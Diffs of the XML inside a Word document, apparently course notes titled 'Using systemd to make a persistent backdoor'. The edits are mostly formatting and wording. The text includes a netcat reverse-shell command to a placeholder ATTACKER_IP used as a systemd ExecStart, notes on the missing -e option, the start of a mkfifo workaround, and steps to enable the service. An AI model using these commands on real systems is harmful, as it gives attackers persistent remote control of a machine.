--- a/3.Linux/05.Apps and Services/systemd-backdoor.docx
+++ b/3.Linux/05.Apps and Services/systemd-backdoor.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -8,6 +8,11 @@
       </w:pPr>
       <w:r>
         <w:t>Using systemd to make a persistent backdoor</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This document shows the winding route I took to arrive at a working backdoor.  There were errors along the way, and they are included to demonstrate even simple tasks take persistence to complete.  If you want to skip the errors, go to “Cut to the Chase” near the end of the document.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -78,6 +83,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>First, test the command</w:t>
       </w:r>
     </w:p>
@@ -127,7 +133,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>ExecStart=/usr/bin/nc -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -358,6 +364,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Use /-e to search for the -e option.</w:t>
       </w:r>
       <w:r>
@@ -504,6 +511,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>The second line is complicated:</w:t>
       </w:r>
       <w:r>
@@ -839,6 +847,7 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Hmm, we got a ‘$’ prompt back.  </w:t>
       </w:r>
       <w:r>
@@ -1172,6 +1181,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Next, create a systemd service with our command</w:t>
       </w:r>
     </w:p>
@@ -1279,6 +1289,14 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Cut to the Chase</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
@@ -1397,6 +1415,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3045E8D8" wp14:editId="6D2A8A75">
             <wp:extent cx="6191250" cy="3168413"/>
@@ -1568,7 +1587,13 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>If you run the backdoor.sh file, you should get a working backdoor.</w:t>
+        <w:t>As a test, i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>f you run the backdoor.sh file you should get a working backdoor.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1627,7 +1652,19 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>Now, create the systemd service file like the article listed, but replace ExecStart with our shell script.</w:t>
+        <w:t xml:space="preserve">Now, create the systemd service file like the article listed, but replace ExecStart with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>the path to our</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shell script.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1692,6 +1729,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65F0540B" wp14:editId="36F4A919">
             <wp:extent cx="6081296" cy="3095625"/>
@@ -1895,6 +1933,7 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Now we need to enable the service and start it.</w:t>
       </w:r>
       <w:r>
@@ -2146,6 +2185,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Reverse Shell</w:t>
       </w:r>
     </w:p>
@@ -2405,6 +2445,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48E8C70E" wp14:editId="33E9624E">
             <wp:extent cx="5486400" cy="839337"/>
@@ -2525,7 +2566,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="61C87453"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
@@ -2622,7 +2663,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>

--- a/3.Linux/05.Apps and Services/systemd-backdoor.docx
+++ b/3.Linux/05.Apps and Services/systemd-backdoor.docx
@@ -1,18 +1,41 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Title"/>
       </w:pPr>
       <w:r>
-        <w:t>Using systemd to make a persistent backdoor</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>This document shows the winding route I took to arrive at a working backdoor.  There were errors along the way, and they are included to demonstrate even simple tasks take persistence to complete.  If you want to skip the errors, go to “Cut to the Chase” near the end of the document.</w:t>
+        <w:t xml:space="preserve">Using systemd to make a persistent </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>backdoor</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">This document shows the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>winding route</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> I took to arrive at a working backdoor.  There were errors along the way, and they are included to demonstrate even simple tasks take persistence to complete.  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>If you want to skip the errors, go to “Cut to the Chase” near the end of the document</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -84,8 +107,13 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>First, test the command</w:t>
-      </w:r>
+        <w:t xml:space="preserve">First, test the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>command</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -106,12 +134,30 @@
       <w:r>
         <w:t xml:space="preserve"> to </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>Wantedby=multi-user.target</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>Wantedby</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>=multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve">, is put into a file that defines the systemd service.  The format for the file is very specific—look here for more information </w:t>
       </w:r>
@@ -152,12 +198,56 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>/usr/bin/nc -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Note:  nc, aka netcat, is a powerful utility for reading and writing to the network.  See </w:t>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>null</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Note:  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, aka netcat, is a powerful utility for reading and writing to the network.  See </w:t>
       </w:r>
       <w:hyperlink r:id="rId8" w:history="1">
         <w:r>
@@ -314,10 +404,34 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>It appears the -e option is not available in this installation of netcat (nc).</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  The -e option is the core to this backdoor.  It tells netcat to execute a shell (/bin/bash in this case) to allow the attacker to remotely control the computer.  It has been omitted from the nc installed on Ubuntu 20.04 Desktop for obvious security reasons.  However, if we search the manual for netcat (man nc) for the -e option we find this:</w:t>
+        <w:t>It appears the -e option is not available in this installation of netcat (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  The -e option is the core to this backdoor.  It tells netcat to execute a shell (/bin/bash in this case) to allow the attacker to remotely control the computer.  It has been omitted from the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> installed on Ubuntu 20.04 Desktop for obvious security reasons.  However, if we search the manual for netcat (man </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) for the -e option we find this:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -475,14 +589,126 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>rm -f /tmp/f; mkfifo /tmp/f</w:t>
+        <w:t>rm -f /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/f; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>mkfifo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f</w:t>
       </w:r>
